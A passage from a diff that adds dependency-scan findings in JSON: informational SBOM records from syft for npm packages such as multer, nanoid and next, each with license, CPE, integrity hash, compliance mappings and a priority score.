1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "43d359d2fd9254cd", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: minipass 7.1.3", + "title": "minipass 7.1.3", + "description": "Package discovered: minipass 7.1.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "a4e62963fcdf0651", + "name": "minipass", + "version": "7.1.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "BlueOak-1.0.0", + "spdxExpression": "BlueOak-1.0.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:minipass:minipass:7.1.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/minipass@7.1.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.3.tgz", + "integrity": "sha512-tEBHqDnIoM/1rXME1zgka9g6Q2lcoCkxHLuc7ODJ5BxbP5d4c2Z5cGgtXAku59200Cx7diuHTOYfSBD8n6mm8A==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "371d68f8a3e92216", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: mkdirp 0.5.6", + "title": "mkdirp 0.5.6", + "description": "Package discovered: mkdirp 0.5.6", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "4ee017b1ce1fca30", + "name": "mkdirp", + "version": "0.5.6", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:mkdirp:mkdirp:0.5.6:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/mkdirp@0.5.6", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.6.tgz", + "integrity": "sha512-FP+p8RB8OWpF3YZBCrP5gtADmtXApB5AMLn+vdyA+PyxCjrCs00mjyUozssO33cwDeT3wNGdLxJ5M//YqtHAJw==", + "dependencies": { + "minimist": "^1.2.6" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "85ab0a570b2a1b2d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: morgan 1.10.1", + "title": "morgan 1.10.1", + "description": "Package discovered: morgan 1.10.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "0b0e2e978d7d93f4", + "name": "morgan", + "version": "1.10.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:morgan_project:morgan:1.10.1:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/morgan@1.10.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/morgan/-/morgan-1.10.1.tgz", + "integrity": "sha512-223dMRJtI/l25dJKWpgij2cMtywuG/WiUKXdvwfbhGKBhy1puASqXwFzmWZ7+K73vUPoR7SS2Qz2cI/g9MKw0A==", + "dependencies": { + "basic-auth": "~2.0.1", + "debug": "2.6.9", + "depd": "~2.0.0", + "on-finished": "~2.3.0", + "on-headers": "~1.1.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "19152fd7179a58f9", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: ms 2.0.0", + "title": "ms 2.0.0", + "description": "Package discovered: ms 2.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "46f1aa86e531772d", + "name": "ms", + "version": "2.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:vercel:ms:2.0.0:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/ms@2.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "c6acafac62af1ee0", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: ms 2.1.3", + "title": "ms 2.1.3", + "description": "Package discovered: ms 2.1.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "bb1077662b3cb7e0", + "name": "ms", + "version": "2.1.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:vercel:ms:2.1.3:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/ms@2.1.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "ffedfc57a9f39743", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: multer 1.4.5-lts.2", + "title": "multer 1.4.5-lts.2", + "description": "Package discovered: multer 1.4.5-lts.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "775c553ab4f0a485", + "name": "multer", + "version": "1.4.5-lts.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:multer:multer:1.4.5-lts.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/multer@1.4.5-lts.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/multer/-/multer-1.4.5-lts.2.tgz", + "integrity": "sha512-VzGiVigcG9zUAoCNU+xShztrlr1auZOlurXynNvO9GiWD1/mTBbUljOKY+qMeazBqXgRnjzeEgJI/wyjJUHg9A==", + "dependencies": { + "append-field": "^1.0.0", + "busboy": "^1.0.0", + "concat-stream": "^1.5.2", + "mkdirp": "^0.5.4", + "object-assign": "^4.1.1", + "type-is": "^1.6.4", + "xtend": "^4.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "9d7c97f3f3cb9ec0", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: mz 2.7.0", + "title": "mz 2.7.0", + "description": "Package discovered: mz 2.7.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "96c78782a0a6a6e8", + "name": "mz", + "version": "2.7.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:mz:mz:2.7.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/mz@2.7.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/mz/-/mz-2.7.0.tgz", + "integrity": "sha512-z81GNO7nnYMEhrGh9LeymoE4+Yr0Wn5McHIZMK5cfQCl+NDX08sCZgUc9/6MHni9IWuFLm1Z3HTCXu2z9fN62Q==", + "dependencies": { + "any-promise": "^1.0.0", + "object-assign": "^4.0.1", + "thenify-all": "^1.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "545c4a29aa435f71", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: nanoid 3.3.11", + "title": "nanoid 3.3.11", + "description": "Package discovered: nanoid 3.3.11", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "fc2d97a12d1a4dda", + "name": "nanoid", + "version": "3.3.11", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:nanoid_project:nanoid:3.3.11:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/nanoid@3.3.11", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/nanoid/-/nanoid-3.3.11.tgz", + "integrity": "sha512-N8SpfPUnUp1bK+PMYW8qSWdl9U+wwNWI4QKxOYDy9JAro3WMX7p2OeVRF9v+347pnakNevPmiHhNmZ2HbFA76w==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "932afc2de4b38fa5", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: negotiator 0.6.3", + "title": "negotiator 0.6.3", + "description": "Package discovered: negotiator 0.6.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "312bd96694b2eb5b", + "name": "negotiator", + "version": "0.6.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:negotiator:negotiator:0.6.3:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/negotiator@0.6.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/negotiator/-/negotiator-0.6.3.tgz", + "integrity": "sha512-+EUsqGPLsM+j/zdChZjsnX51g4XrHFOIXwfnCVPGlQk/k5giakcKsuxCObBRu6DSm9opw/O6slWbJdghQM4bBg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "d346e21d42fdf73e", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: next 14.2.3", + "title": "next 14.2.3", + "description": "Package discovered: next 14.2.3", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "a9792237818f8415", + "name": "next", + "version": "14.2.3", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:vercel:next.js:14.2.3:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/next@14.2.3", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/next/-/next-14.2.3.tgz", + "integrity": 